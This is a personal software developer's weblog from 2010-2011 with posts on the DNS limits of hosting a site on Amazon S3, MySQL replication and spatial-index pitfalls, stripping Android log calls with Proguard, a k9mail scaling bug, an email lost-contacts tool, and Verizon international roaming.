Joseph Barillari's weblog

Core dumped.

04 April 2011


If you hack Scala in Emacs, you must try ENSIME. The sbt-shell mode alone is worth the price of admission.

23 February 2011

Why you *can't* run your website from Amazon S3 (at least, not entirely)

A few days ago, I saw a blog post by Amazon CTO Werner Vogels: "New AWS feature: Run your website from Amazon S3." I wanted to set up a static website at and thought this would be a great way to do it.

After uploading my files to S3, I edited my DNS settings. I tried adding a CNAME record to point to For some reason, GoDaddy refused to let me do this. Googling eventually led me to this page, which explained that RFC 1034 prohibits creating a CNAME for the root of a domain. In other words, while I could point to S3, I couldn't point to S3. I would have to set up a server somewhere to serve redirects from to

I'm not the first to post about the root CNAME issue: there are some comments about it on Dr. Vogels's initial post, and even a reply from Dr. Vogels where he tells a reader to "redirect {mysite}.com to www.{mysite}.com." (How is the user supposed to create a redirect using only S3? Read on.)

Less than 12 hours ago, Dr. Vogels followed up with a new post, "Free at Last - A Fully Self-Sustained Blog Running in Amazon S3." He explains that by switching to Disqus for comments and Bing for search, he was able to move his blog entirely to S3.

Entirely? How did he solve the redirection problem? Let's see:

$ host has address mail is handled by 10 mail is handled by 10

Whom does that address belong to?

$ whois 'n'
# The following results may also be obtained via:

NetRange: -
NetHandle: NET-74-208-0-0-1
Parent: NET-74-0-0-0-0
NetType: Direct Allocation
NameServer: NSA2.1AND1.COM
NameServer: NSA.1AND1.COM
Comment: For abuse issues, please use only
RegDate: 2006-11-22
Updated: 2009-08-12

It doesn't look like belongs to S3. Let's see what happens when we connect:

$ telnet 80
Connected to
Escape character is '^]'.

HTTP/1.1 200 OK
Content-Length: 79640
Content-Type: text/html
Last-Modified: Thu, 24 Feb 2011 02:21:34 GMT
Accept-Ranges: bytes
ETag: "af7bb38ec9d3cb1:447"
Server: Microsoft-IIS/6.0 <--- Definitely not S3
X-Powered-By: ASP.NET
Date: Thu, 24 Feb 2011 06:43:43 GMT

It looks like still points to Dr. Vogels's old server. If you go to, however, the site is indeed served from S3:

$ telnet 80
Connected to
Escape character is '^]'.

HTTP/1.1 200 OK
x-amz-id-2: JycRZ0LH9NSGYyM6A+B24cSpSs5AsMUTH8wn95OoVwnOcrDQ/Q2/xbcldydB+IGQ
x-amz-request-id: 18BBB3B91F04D1B6
Date: Thu, 24 Feb 2011 06:50:53 GMT
Cache-Control: no-cache
Last-Modified: Thu, 24 Feb 2011 02:25:20 GMT
ETag: "000d8cb6f9e84d4012aaa0739c48038d"
Content-Type: text/html
Content-Length: 79640
Server: AmazonS3

What does this mean? It means that there is still one final dependency if you want to serve your site from S3. Unless you want to ignore users who go to {mysite}.com instead of www.{mysite}.com, you need a web server that redirects users from {mysite}.com to www.{mysite}.com. Apache's mod_rewrite can do this. In fact, the manual for mod_rewrite even provides an example of how to do exactly that.

A generously-minded individual (or AWS) could even set up one redirection server for everyone who wanted to host their second-level domain in S3. Those who wanted to host their sites in S3 could just point the root A record for their domain to the redirector, which could be an Apache server with a mod_rewrite configuration that looks something like this:
RewriteCond %{HTTP_HOST}   ^[^.]+\.[a-z]+$ [NC]
RewriteRule ^/?(.*) http://www.%{HTTP_HOST}/$1 [L,R=301,NE]
[I haven't tested this and am not an Apache expert, so please let me know if you can't perform %{variable} substitution in a RewriteRule.]
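
To make the intent of that rule easier to check, here is a minimal Python sketch of the same decision. It is not Apache and says nothing about whether %{HTTP_HOST} substitution works in a RewriteRule; the function name redirect_target is made up for illustration. It only mirrors the regular expression: a host with exactly one dot gets sent to its www. counterpart, and anything else is left alone.

```python
import re

# Same pattern as the RewriteCond above: exactly one dot in the host,
# so "example.com" matches but "www.example.com" does not.
BARE_DOMAIN = re.compile(r"^[^.]+\.[a-z]+$", re.IGNORECASE)


def redirect_target(host, path):
    """Return the URL to redirect to, or None if no redirect applies.

    Hypothetical helper; mirrors RewriteRule ^/?(.*) by dropping at most
    one leading slash from the path before appending it.
    """
    if not BARE_DOMAIN.match(host):
        return None
    rest = path[1:] if path.startswith("/") else path
    return "http://www.%s/%s" % (host, rest)


print(redirect_target("example.com", "/a/b"))      # http://www.example.com/a/b
print(redirect_target("www.example.com", "/a/b"))  # None
```

One limitation is visible right away: a registered domain like example.co.uk has two dots, so this pattern would never redirect it.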

Until such a service exists, you will still need an HTTP server elsewhere in order to host your entire site in S3.

[How did I solve this issue? I avoided it. I put the content in EBS and served it from an EC2 instance. I use EC2 for other projects and have always been pleased with it.]

Update: See Dr. Vogels's response in the comments.

21 February 2011

Great title, poor execution

I saw this article earlier today:

It turns out that being "kicked out of Y Combinator" was less dramatic than I thought. I was kind of expecting the author would describe having his epaulettes hipster goatee ceremoniously torn off, his iPad shattered, his Twitter account cancelled, his Posterous background replaced with Goatse, and being stripped to his undershorts, rolled in honey and feathers, and dumped just outside the border of Mountain View.

29 January 2011

Troubleshooting mysql replication

PROTIP: When you're stuck on "Waiting to reconnect after a failed master event read" or some other equally unhelpful error message, start the slave mysqld on the console. You'll get much more useful error messages that Ubuntu appears to be filtering from syslog, like:

110130 0:41:25 [ERROR] Error reading packet from server: Access denied; you need the REPLICATION SLAVE privilege for this operation ( server_errno=1227)

PROTIP 2: Note that the replication will start as soon as you fix the problem, so you might want to run it using 'screen' so you can wait for an opportune time to kill the slave mysqld and restart it using /etc/init.d/mysql start or start mysql or whathaveyou.

Sharing EBS snapshots on EC2

If you want to share an EBS volume snapshot on EC2 with another account, the Amazon documentation explains how: find the account number of the target account, right-click the snapshot on the management console, choose permissions, and add the account number. What the instructions don't say is that you can't actually create a volume from that snapshot on the target account---it won't show up on the list. You have to use the command-line tool ec2-create-volume.

03 January 2011

Excising android.util.Log calls when you publish your Android app

The Android platform includes support for debuggers, but since real programmers don't use debuggers (and because I'm not using Eclipse), I use the equivalent of printf: android.util.Log to follow what's going on in my programs.

Because there's no macro processor in Java (or Scala, which I'm actually using), there are two standard ways to remove debugging statements from your code before you ship it:

  1. Prefix every call to the logging function with an if statement:
    if (GlobalConstants.DEBUG) Log.v(GlobalConstants.LOG_TAG, "isBetterLocation(): isSignificantlyNewer->ret true")
    A Makefile (or whatever your build system is) can set GlobalConstants.DEBUG appropriately. This is regrettably verbose.* It also doesn't actually eliminate the code: maybe the Scala compiler isn't optimizing hard enough, but when I disassemble the class files (actually, the dex files), the calls are still there, wasting precious bytes, even though they never will be called.**

  2. Tell Proguard to eliminate the calls to logging functions with a configuration directive like:
    -assumenosideeffects class android.util.Log {public static int v(...);public static int d(...);public static int w(...);public static int i(...);}

    Since I'm running Proguard anyway (the Scala Build Tool Android plugin runs it by default), this would seem to be the best way.

The only problem was that Method #2 didn't work. I tried loads of variants on the class specification for -assumenosideeffects, but the Log statements kept showing up in the code.

It turned out that there were no fewer than two reasons why it wasn't working.

The first was that the scala-build-tool Android plugin had switched off Proguard's optimization by adding the -dontoptimize switch in AndroidProject.scala:

def proguardTask = task {
val args = "-injars" :: mainCompilePath.absolutePath+File.pathSeparator+
(if (!proguardInJars.getPaths.isEmpty)"(!META-INF/MANIFEST.MF)").mkString(File.pathSeparator) else "") ::
"-outjars" :: classesMinJarPath.absolutePath ::
"-libraryjars" :: libraryJarPath.getPaths.mkString(File.pathSeparator) ::
"-dontwarn" :: "-dontoptimize" :: "-dontobfuscate" :: // <------ ROFL
"-keep public class * extends" ::
"-keep public class * extends" ::
[definition continues ...]

Fortunately, that was easy to fix once I knew what to look for. I copied proguardTask into the MainProject class of my project/build/MyProjectName.scala project definition file, slapped on an override, and deleted the offending "-dontoptimize" (and "-dontobfuscate", too).

Despite that fix, Proguard still wouldn't erase the Log calls. Casting around for the second reason (and wondering why I didn't just solve this problem with a few calls to sed in a Makefile), I unzipped the generated .apk and disassembled the classes.dex file with dedexer. Inside was code like this:

sget-object v1,com/mycode/android/GlobalConstants$.MODULE$ Lcom/mycode/android/GlobalConstants$;
invoke-interface {v1},com/mycode/android/GlobalDebugState/DEBUG ; DEBUG()Z
move-result v1
if-eqz v1,l1d01c
sget-object v1,com/mycode/android/GlobalConstants$.MODULE$ Lcom/mycode/android/GlobalConstants$;
invoke-virtual {v1},com/mycode/android/GlobalConstants$/LOG_TAG ; LOG_TAG()Ljava/lang/String;
move-result-object v1
const-string v2,"clickTakePicture: erasing picture..."
invoke-static {v1,v2},android/util/Log/v ; v(Ljava/lang/String;Ljava/lang/String;)I
move-result v1
invoke-static {v1},java/lang/Integer/valueOf ; valueOf(I)Ljava/lang/Integer;
(code continues...)
Note that after the call to Log.v, the program is doing something with the result of that function: it's calling valueOf on the result. Why on earth is it doing this?

My guess was that it had something to do with the fact that the if statement in Scala is also an expression: it evaluates to the value of the last expression in the code block it executed. So you can write the following:

scala> 3 + (if (1>2) 5 else 6)
res0: Int = 9

I hypothesized that the Scala compiler was keeping the result of the Log.v function call around so that if (GlobalConstants.DEBUG) would be able to return a value. Now, it shouldn't have done so, because I wasn't actually using the if expression. Call this a bug in Scala. Proguard, noticing that the program was doing something with the return value of Log, refused to optimize it away.

On that hunch, I tried removing all of the if (GlobalConstants.DEBUG) conditionals. The Log statements disappeared. Success!

Well, not quite. Because every code block in Scala evaluates to the value of the last expression evaluated inside that block, there were code blocks where the call to Log was the last such expression. For instance, this case, where I was using pattern matching as flow control but ignoring the return value of the match:

mevt.getAction match {
case x:Int if x == MotionEvent.ACTION_DOWN || x == MotionEvent.ACTION_MOVE => {
mLastTB = topBottomNeither
mLastY = mevt.getY
Log.v(SQConstants.LOG_TAG, "onTouchEvent started new state:" + mLastTB + " mevtY:" + mLastY)
}
case _ => null
}

To get the Scala compiler to discard the return value from that Log.v, I inserted a null after it, as the last expression in the case x... block above. Success!

Well, not exactly. Now my code is peppered with unnecessary nulls (any literal would do). (I should track down the offending bug in Scala, but I think I've sunk enough time into this one already.) And, to make matters worse, -assumenosideeffects eliminates the function calls but won't optimize away any expressions in the arguments to the log functions: e.g., if you have the line:

Log.v(Constants.LOG_TAG, " NPT.before() called on ctx:" + context);

You get this (completely unused) computation in the output:

.line 623
new-instance v0,scala/collection/mutable/StringBuilder
invoke-direct {v0},scala/collection/mutable/StringBuilder/<init> ; <init>()V
const-string v1," NPT.before() called on ctx:"
invoke-virtual {v0,v1},scala/collection/mutable/StringBuilder/append ; append(Ljava/lang/Object;)Lscala/collection/mutable/StringBuilder;
move-result-object v0
invoke-virtual {v0,v8},scala/collection/mutable/StringBuilder/append ; append(Ljava/lang/Object;)Lscala/collection/mutable/StringBuilder;
move-result-object v0
invoke-virtual {v0},scala/collection/mutable/StringBuilder/toString ; toString()Ljava/lang/String;

[note that you have to turn off obfuscation to see the actual method and object names]

We could tell Proguard to assumenosideeffects for scala.collection.mutable.StringBuilder, but then it might optimize away .append calls that we do want. What would be ideal would be if we could tell Proguard that calls on the StringBuilder object had no side effects except on that object itself, so that it could notice that the object was never used and delete it. This is really the sort of thing a compiler should do, though---all the more reason why it would be ideal if a construct like

if(GlobalObject.DEBUG) whatever()

...would be dropped by the compiler if GlobalObject.DEBUG were declared both false and final.

Conclusion: short of hacking a macro processor (read: sed, because I'm lazy) into the build process, there's no easy way to conditionally and completely excise those debugging statements. I'm going to leave them. Users won't see them, but they will take up (a negligible amount of) space and waste (a negligible number of) cycles.

* Famed hacker Jamie Zawinski had this complaint a decade ago. A StackOverflow poster notes that, to this day, #ifdef DEBUG is still hard to simulate in Java.

** Computer storage may be infinite, but mobile phones are small and wireless connections are slow.
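
For what it's worth, the sed-style hack mentioned in the conclusion could look something like the Python sketch below. This is an illustration, not something I have wired into a build: the function name strip_log_calls and the pattern are made up here, it only understands Log calls that sit on a single line by themselves (optionally behind an if (Something.DEBUG) guard), and it would quietly change the value of any block whose last expression was the Log call.

```python
import re

# A whole line consisting of one Log.v/d/i/w call, optionally prefixed by a
# guard such as "if (GlobalConstants.DEBUG)". Multi-line calls are NOT handled.
LOG_LINE = re.compile(r"^\s*(if\s*\([\w.]+\)\s*)?Log\.[vdiw]\(.*\)\s*;?\s*$")


def strip_log_calls(source):
    """Return source with every single-line Log call removed (naive)."""
    kept = [line for line in source.splitlines() if not LOG_LINE.match(line)]
    return "\n".join(kept)


sample = "\n".join([
    "mLastY = mevt.getY",
    'Log.v(TAG, "y:" + mLastY)',
    'if (GlobalConstants.DEBUG) Log.v(TAG, "x")',
    "foo()",
])
print(strip_log_calls(sample))
```

Because the whole line goes away before the compiler ever sees it, the string concatenation in the arguments disappears too, which is the one thing -assumenosideeffects could not do.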

16 December 2010

"Incorrect string value"

If you see an "Incorrect string value" error in Django and you're using MySQL, run


and check the CHARACTER_SET_NAME for the column in question.

If it's not set correctly (e.g., it's latin1 and you're trying to insert utf8), change it with

alter table TABLE modify COLUMN TYPE character set utf8;
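
One way to get at CHARACTER_SET_NAME from a script is to query information_schema.COLUMNS. The Python sketch below is an assumption about how one might do that, not necessarily the query this post originally showed: the helper names charset_query and non_utf8_columns are hypothetical, and the %s placeholders assume a DB-API driver that uses that parameter style (MySQLdb does).

```python
def charset_query(schema, table):
    """Return (sql, params) suitable for cursor.execute(sql, params)."""
    sql = (
        "SELECT COLUMN_NAME, CHARACTER_SET_NAME, COLLATION_NAME "
        "FROM information_schema.COLUMNS "
        "WHERE TABLE_SCHEMA = %s AND TABLE_NAME = %s"
    )
    return sql, (schema, table)


def non_utf8_columns(rows):
    """Pick out text columns whose character set is not utf8/utf8mb4.

    rows are (column_name, character_set_name, collation_name) tuples;
    non-text columns report a NULL (None) character set and are skipped.
    """
    ok = (None, "utf8", "utf8mb4")
    return [name for name, charset, _ in rows if charset not in ok]


# Example rows, shaped like what the query above would return.
rows = [
    ("id", None, None),
    ("title", "latin1", "latin1_swedish_ci"),
    ("body", "utf8", "utf8_general_ci"),
]
print(non_utf8_columns(rows))  # ['title']
```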

Restarting e16 if you can't use the menu

I use the enlightenment window manager, largely because I'm used to it. E16 is pretty stable, but sometimes it gets wedged and needs to be restarted. Fortunately, E retains its state between restarts. Just Mouse-3 the desktop and pick "Restart Enlightenment".

But what if E is so wedged that you can't middle-click the desktop? Suppose, say, the alt-tab menu is on the screen, hogging the focus, and won't go away? You could just kill E, but then you'd have to reopen and reposition all of your windows again.

Solution: ctrl-alt-f1 to a virtual console, log in, and run eesh, the command-line interface to Enlightenment. Like this:

$ env DISPLAY=:0 eesh

07 December 2010

PROTIP: X11 fixed font failure

This is the first good explanation I've seen of the infamous X11/vnc error:

Fatal server error:
could not open default font 'fixed'

16 November 2010

PROTIP (for nerds)

If you're not running anything on port 443, forward it to 22. That way, if you find yourself stuck behind a fascist firewall*, you can still ssh to your personal machine.

* like the one on megabus

11 November 2010

google = win. ec2.micro+ubuntu+openjdk= fail.

I tried to install OpenJDK on an Amazon EC2 micro instance. The terminal stopped echoing. The machine wasn't taking new ssh connections. I checked the system log---a kernel panic! Charming. I rebooted. Same deal. I stopped the instance and brought it up a few seconds later, thinking it might send me to a new dom-0 host. Tried the install again. Nope, same issue.

Then I typed "ec2 micro kernel panic" into Google. Third hit:

William's Blog | Like running with scissors, only more dangerous

Apparently installing OpenJDK using apt-get on Ubuntu 10.04 on an AWS EC2 Micro instance causes a kernel panic. I don't know why, and apparently neither ...

Here's the official bug report. The problem has something to do with the VM system. The workaround is to boot any other kind of instance (say, small), install java on that, then shut it down, change it to micro, and boot it. My workarounds would be to use another JRE like cacao or jamvm (too bad neither of them successfully runs the Google Closure Compiler, which was the point of putting Java on the micro instance), or just do the compilation elsewhere.

Hey, at least Google still works.

29 October 2010

Thinking before typing (MySQL spatial indices gotcha)

"SQL, Lisp, and Haskell are the only programming languages that I’ve seen where one spends more time thinking than typing." --Philip Greenspun

MySQL, I just learned, has a geometry data type and supports R-tree indices, which could be very helpful for a new project I'm exploring. I wanted to combine a geometric lookup with a temporal lookup, but discovered that the naive way of doing so has some pitfalls.

Here was idea #1:

create table gt4 (g point not null, t datetime not null, spatial index(g), index(t), index(t,g));

If I put a few sample values into that table:

insert into gt4 (g,t) values (GeomFromText('Point(8 8)'), '2008-01-01 11:55');
insert into gt4 (g,t) values (GeomFromText('Point(81 80)'), '2009-01-01 11:55');
insert into gt4 (g,t) values (GeomFromText('Point(1 0)'), '2008-01-01 11:55');

...a bounding-box query worked as expected:

> select t, AsText(g) from gt4 where MBRContains(GeomFromText('Polygon((0 0, 31 0, 31 16, 0 16, 0 0))'),g);
| t | AsText(g) |
| 10 | POINT(8 8) |
| 10 | POINT(1 0) |
2 rows in set (0.00 sec)

But, if I were to make a very small change---which is to say, reversing the arguments of the last index()...

create table gt5 (g point not null, t datetime not null, spatial index(g), index(t), index(g,t));

If we reinsert the same values, things seem to work:

insert into gt5 (g,t) values (GeomFromText('Point(8 8)'), '2008-01-01 11:55');
insert into gt5 (g,t) values (GeomFromText('Point(81 80)'), '2009-01-01 11:55');
select t, AsText(g) from gt5 where MBRContains(GeomFromText('Polygon((0 0, 31 0, 31 16, 0 16, 0 0))'),g);
| t | AsText(g) |
| 2008-01-01 11:55:00 | POINT(8 8) |
1 row in set (0.00 sec)

But if we add that last row...

insert into gt5 (g,t) values (GeomFromText('Point(1 0)'), '2009-01-01 11:55');

Then select...

> select t, AsText(g) from gt5 where MBRContains(GeomFromText('Polygon((0 0, 31 0, 31 16, 0 16, 0 0))'),g);
Empty set (0.00 sec)

Say what?

MySQL uses a different index in each case. For table gt4, it picks the spatial index:

mysql> show create table gt4\G
*************************** 1. row ***************************
Table: gt4
Create Table: CREATE TABLE `gt4` (
`g` point NOT NULL,
`t` int(11) DEFAULT NULL,
SPATIAL KEY `g` (`g`),
KEY `t` (`t`),
KEY `t_2` (`t`,`g`(25))
1 row in set (0.00 sec)

mysql> explain select t, AsText(g) from gt4 where MBRContains(GeomFromText('Polygon((0 0, 31 0, 31 16, 0 16, 0 0))'),g)\G
*************************** 1. row ***************************
id: 1
select_type: SIMPLE
table: gt4
type: range
possible_keys: g
key: g
key_len: 34
ref: NULL
rows: 2
Extra: Using where
1 row in set (0.00 sec)

Whereas for gt5, it uses the combined index:

mysql> show create table gt5\G
*************************** 1. row ***************************
Table: gt5
Create Table: CREATE TABLE `gt5` (
`g` point NOT NULL,
`t` datetime NOT NULL,
SPATIAL KEY `g` (`g`),
KEY `t` (`t`),
KEY `g_2` (`g`(25),`t`)
1 row in set (0.00 sec)

mysql> explain select t, AsText(g) from gt5 where MBRContains(GeomFromText('Polygon((0 0, 31 0, 31 16, 0 16, 0 0))'),g)\G
*************************** 1. row ***************************
id: 1
select_type: SIMPLE
table: gt5
type: range
possible_keys: g,g_2
key: g_2
key_len: 27
ref: NULL
rows: 1
Extra: Using where
1 row in set (0.00 sec)

The documentation explains that combined indices concatenate the columns together. Apparently, this doesn't play nicely with geometry queries.
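
As a sanity check on what the query ought to return no matter which index MySQL picks, here is the bounding-box test redone by hand in Python. This is only a sketch of the geometry, not of MySQL's implementation; the function names are made up, and treating points on the edge as contained is an assumption that happens to agree with the gt4 output above, where POINT(1 0) was returned.

```python
def bounding_box(ring):
    """Minimum bounding rectangle of a list of (x, y) vertices."""
    xs = [x for x, _ in ring]
    ys = [y for _, y in ring]
    return min(xs), min(ys), max(xs), max(ys)


def box_contains(box, point):
    """True if point lies inside or on the edge of box."""
    min_x, min_y, max_x, max_y = box
    x, y = point
    return min_x <= x <= max_x and min_y <= y <= max_y


# The polygon and the three points used in the inserts above.
polygon = [(0, 0), (31, 0), (31, 16), (0, 16), (0, 0)]
points = [(8, 8), (81, 80), (1, 0)]

box = bounding_box(polygon)
matches = [p for p in points if box_contains(box, p)]
print(matches)  # [(8, 8), (1, 0)]
```

Two of the three points fall inside the box, so the "Empty set" from gt5 is the wrong answer, not a different reading of the data.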

17 October 2010

International roaming with Verizon Wireless

Verizon Wireless may have the best coverage in the U.S., but, regrettably, its handsets use a radio technology that hasn't caught on in most of the world. In most foreign countries, it's impossible to roam with a Verizon CDMA handset. I wanted to continue to receive email on my phone while abroad for a few weeks. Options included buying a GSM phone before I arrived and purchasing local SIM cards, buying a GSM phone in-country and purchasing local SIM cards, or buying a global phone and a global data plan from AT&T. Happily, just before I left I happened upon a Verizon program designed exactly for this: the GlobalEmail program coupled with the amazingly under-advertised Global Travel program.

GlobalEmail gives you a flat-rate unlimited data plan while traveling. Global Travel loans you a handset that works abroad. Verizon markets a small number of phones that include both GSM and CDMA radios. In the Global Travel program, they will FedEx you one for your trip, which you return after arriving back in the U.S. You can keep your number, so there's no need to set up call forwarding, as you would if you bought foreign SIM cards. (Google Voice won't forward to international numbers, but I assume that there exist paid services that will.) Voice calls are quite expensive ($2/min and up for all but a small handful of countries), although Verizon offers a roughly 20% discount if you pay an extra $5 per month. I might have had to take a long call or two, so I opted for this.

Unfortunately, none of Verizon's global phones run Android. I received a Samsung Saga, which runs Windows Mobile 6.1. The Saga was a candybar-format phone with an amazing array of input methods: a physical keyboard, a touchpad that toggled between moving a mouse cursor and scrolling through interface widgets, and a touchscreen supporting both stylus and (imprecise) fingertip input. The phone was never quite as easy-to-use as the Droid with its paltry two input methods (keyboard and fingertip touchscreen). The UI was also not as slick. I never got the hang of scrolling in large web pages. But it was certainly serviceable: I managed to book lodging, read news, answer email, send and receive Google Voice SMS messages, and even make the occasional phone call.

The chief inconvenience of the program was setting up the phone. Microsoft's email client was a bit under-documented. I had to Google to learn that to override the default ports for mail transport, one had to use server:port notation. Mail-checking and web-surfing were noticeably slower than they were on the Droid, although this may have been a function of the networks I used (mostly Vodafone). I ran into a surprising number of total dead spots, most of which were along train routes in Greece.

Some warts included the USB cable, which confusingly deactivated the phone's radio when I plugged it into a Windows machine. The GPS module didn't feed data to Google Maps (or maybe I never set it up properly), so I was usually stuck with "your location within 500 meters" reports. The built-in browser did not identify itself as (or perhaps Wikipedia did not notice it as) a mobile browser, so Wikipedia sent me to its bandwidth-hogging conventional site instead of its bandwidth-sipping mobile site, as it would on the Droid. Battery life was miserable, but no worse than it was on the Droid. (An unfair comparison: I have far more background monitoring processes running on the Droid.) It was really hard to scroll large web pages: switching to mouse mode and click-dragging with the cursor seemed to work, but if a page got stuck reloading, you would have to wait a while.

The good: Very light. Nice form factor---you can use the physical keyboard and even dial one-handed and perhaps without looking at the phone. Worked as advertised. I sent 114 messages with the phone.

The bad: Confusing input methods. Occasionally sluggish UI. Took ages to set up two email accounts. Non-working (or very well-hidden) GPS. No compass, so Google Maps showed my location as a dot, not as an arrow.

The strange: A tiny mirror on the back of the phone, perhaps for composing self-portraits with the camera.

If you're a Verizon customer and are visiting a GSM country, this program is highly recommended. If you plan to travel to GSM countries often, however, it may be worthwhile to buy a global phone and keep it, to avoid having to set up the phone each time.

10 September 2010

The Incredible Shrinking Android

I've been porting the forget-me-never app to Android. To avoid reinventing the wheel, I copied its mail-account-configuration and mail-fetching functions from k9mail. They worked just fine, except for one odd problem: when I used the account-configuration wizard, every time I advanced from screen to screen, the widgets got smaller and smaller. If I toggled back and forth between two pages, I could get them to shrink to the point where the text was completely unreadable.

Strangely, this only happened on the Droid -- it didn't happen in the emulator. (One difference might be that the emulator was running Android 2.0.1 and the Droid was running 2.2.)

I isolated the offending code by the time-honored technique of shotgun debugging: removing everything from the program until the problem went away, then adding things back until I found the culprit. I had thrown away just about everything when I landed on this code in

public void onCreate(Bundle icicle, boolean useTheme)
setLanguage(this, K9.getK9Language());
if (useTheme)

// Gesture detection
gestureDetector = new GestureDetector(new MyGestureDetector());


Commenting out setLanguage fixed the problem. That was odd, I thought, what would i18n have to do with screen scaling? Here's setLanguage:

public static void setLanguage(Context context, String language)
Locale locale;
if (language == null || language.equals(""))
locale = Locale.getDefault();
else if (language.length() == 5 && language.charAt(2) == '_')
// language is in the form: en_US
locale = new Locale(language.substring(0, 2), language.substring(3));
else
locale = new Locale(language);
Configuration config = new Configuration();
config.locale = locale;
The last line is the key. It appears to retrieve a DisplayMetrics object from the context (whatever is subclassing K9Activity, in this case) and then pass it back to the context a second time. Somewhere in that reapplication, a scaling factor is getting applied iteratively, because each time a new activity opens, onCreate gets invoked and the widgets get smaller.

I don't know if this is a bug in the k9mail trunk or just an odd interaction with my phone---I'm using an older version of k9mail that I patched for my purposes and am disinclined to replace it just to test this.

08 August 2010


I have fourteen years of saved email -- about 290,000 messages. Most of this is useless junk: bulk mail, long-expired announcements, reminders about bills or bank statements, mailing lists, error messages, and spam. But buried in that muck is almost all of my online correspondence since 1996.

Accordingly, that message store can answer important questions. The one I have in mind is: Who did I use to talk to? Who have I fallen out of touch with?

Superficially, this is simple: just write a program to list everyone whom I've emailed and who has emailed me back (or vice versa). Sort them by the date of last contact, and let me filter by the number of messages.
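
As a rough sketch of that naive pass (this is not the code in Mail Trends; the function name lost_contacts and the tuple layout are made up for illustration), assume each message has already been boiled down to a (sender, recipient, date) tuple:

```python
from collections import defaultdict
from datetime import date


def lost_contacts(messages, me, min_messages=1):
    """List two-way correspondents, longest-silent first.

    messages: iterable of (sender, recipient, date) tuples.
    me: set of my own addresses.
    Returns [(address, date_of_last_contact)], oldest contact first, keeping
    only addresses I have both written to and heard from at least
    min_messages times each.
    """
    sent = defaultdict(int)
    received = defaultdict(int)
    last = {}
    for sender, recipient, when in messages:
        if sender in me:
            other = recipient
            sent[other] += 1
        elif recipient in me:
            other = sender
            received[other] += 1
        else:
            continue  # neither side is me; ignore
        if other not in last or when > last[other]:
            last[other] = when
    two_way = [a for a in last
               if sent[a] >= min_messages and received[a] >= min_messages]
    return sorted(((a, last[a]) for a in two_way), key=lambda pair: pair[1])


msgs = [
    ("me@example.org", "a@example.org", date(2001, 1, 1)),
    ("a@example.org", "me@example.org", date(2001, 1, 5)),
    ("me@example.org", "b@example.org", date(1999, 3, 1)),
    ("b@example.org", "me@example.org", date(1999, 3, 2)),
    ("spam@example.org", "me@example.org", date(2010, 1, 1)),
]
for address, when in lost_contacts(msgs, {"me@example.org"}):
    print(address, when)
```

The one-way sender drops out because I never wrote back, and the person I last heard from in 1999 sorts ahead of the one from 2001.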

That's the C- approach. A better solution would acknowledge that people use different email addresses. Multiple-emails-per-person creates two complications, one minor and one major. The minor complication is that some people will appear in the list multiple times, once for each address. A bigger deal is that some people will get lost. If I only exchange one or two pieces of email with someone (for instance, because we were in a class together and tended to talk in person), but from different addresses, that approach will miss it entirely. I write to He responds from The naive approach above won't connect those two messages.

Fortunately, email headers often contain names as well as addresses: "Lyndon Johnson ." If you consolidate addresses with the same name or similar names (e.g., normalize "Johnson, Lyndon B." and "Lyndon Baines Johnson" to "Lyndon Johnson"), you might be able to group addresses by person. I implemented another C- solution: it works, but it asks the user about each potential merge. Unfortunately, the low-frequency addresses that you want are also intermixed with spam, so it will take a little while to say "yes" or "no" to each one if your mail store has a fair bit of spam in it -- as mine does. I'll implement a fix for this (perhaps a spam filter) at some point.
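
The name-normalization step might be sketched like this in Python. It is a simplified illustration, not the code I actually shipped: normalize_name and group_addresses are made-up names, it keeps only the first and last word of a name, and it only understands ASCII letters.

```python
import re
from collections import defaultdict


def normalize_name(display_name):
    """Reduce a display name to a "First Last" grouping key (naive)."""
    name = display_name.strip().strip('"')
    # Turn "Last, First M." into "First M. Last".
    if "," in name:
        last, first = [part.strip() for part in name.split(",", 1)]
        name = first + " " + last
    words = re.findall(r"[A-Za-z'-]+", name)
    if len(words) >= 2:
        words = [words[0], words[-1]]  # drop middle names and initials
    return " ".join(word.capitalize() for word in words)


def group_addresses(pairs):
    """Map each normalized name to the set of addresses seen with it.

    pairs: iterable of (display_name, address) taken from message headers.
    """
    groups = defaultdict(set)
    for display_name, address in pairs:
        groups[normalize_name(display_name)].add(address.lower())
    return dict(groups)


print(normalize_name("Johnson, Lyndon B."))     # Lyndon Johnson
print(normalize_name("Lyndon Baines Johnson"))  # Lyndon Johnson
```

A key this crude will happily merge two different people who share a first and last name, which is one reason the real thing asks before merging.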

I put this together, building on top of my college pal Mihai's super-cool Mail Trends. Here's what it looks like:

You can set the minimum days since the last message observed, minimum messages from, and minimum to. You can also hide an entry for a month, three months, a year (if you want to be reminded to contact someone, but not just yet), or forever (to filter out mail from, say, your cable company help desk).

The system is a bit like etacts, but it isn't hosted---everything lives on your personal computer. (I'm pretty paranoid about email and don't like the idea of a random company having access to it, regardless of how trustworthy they may be. All of the code in this system is open-source, so you can see what it does for yourself.)

Right now, this is strictly nerd-ware: you will need to know a fair bit about basic Un*x tools and possibly a bit of Python programming to get it to work. If the response is positive, I can certainly put together a nicely-packaged version. I think it would make a nice mobile-phone app (so it can remind you "hey, it's been six months since you've talked with x").

If you would like to try it, here's how. Open a shell prompt. (On Windows, you will probably need Cygwin.)

1) Install Python 2.6 (or 2.7) and the Cheetah template language and (optionally) the CherryPy web development system, version 3. On a Debian/Ubuntu-based system, you should be able to just type:
$ sudo apt-get install python-cheetah python2.6 python-cherrypy3

2) Download mail-trends-lost-contacts.tar.gz. (If you prefer, you can also download mail-trends and apply my patch instead.)

3) Run the program. If you use Gmail, the command will be something like:

python2.6 --use_ssl, --skip_labels

Be sure to replace with your actual address and list all of the addresses from which you send or receive mail under --me=, separated with commas. (If you don't list them, the program can't figure out which messages are actually from or to you.)

If you use a non-Gmail imap server, the command is slightly different:

python2.6,, --use_ssl --username=YOUR_IMAP_USERNAME --skip-mailboxes=spam,trash

Instead of specifying --skip-mailboxes=, you can also specify --include-mailboxes=, which will include only the mailboxes listed.

If you want to try the address-consolidation feature (which will ask you lots of questions), add the option --interactive-disambiguation. If you want to use the "remind me in x days" feature, add the option "--web-server=10000", where 10000 is the port on which to run the web server.

To use the system, go to in your browser (if you used the --web-server option, setting the port appropriately) or open the file out/index.html (if you didn't use that option).

Enjoy. Let me know what you think.

16 July 2010

More running fail

I had a nice course sketched out --- 5,000 m, so I could feel like I was back in high school again (albeit more out of shape. Lol old age):

Regrettably, the stairway on the Boston side of the river was closed, so I had an unexpected detour through BU. (Which was already holding an orientation. School starts early, I guess.)

13 July 2010

Lol smoothing

This is the route that Google's otherwise great My Tracks said that I ran today:

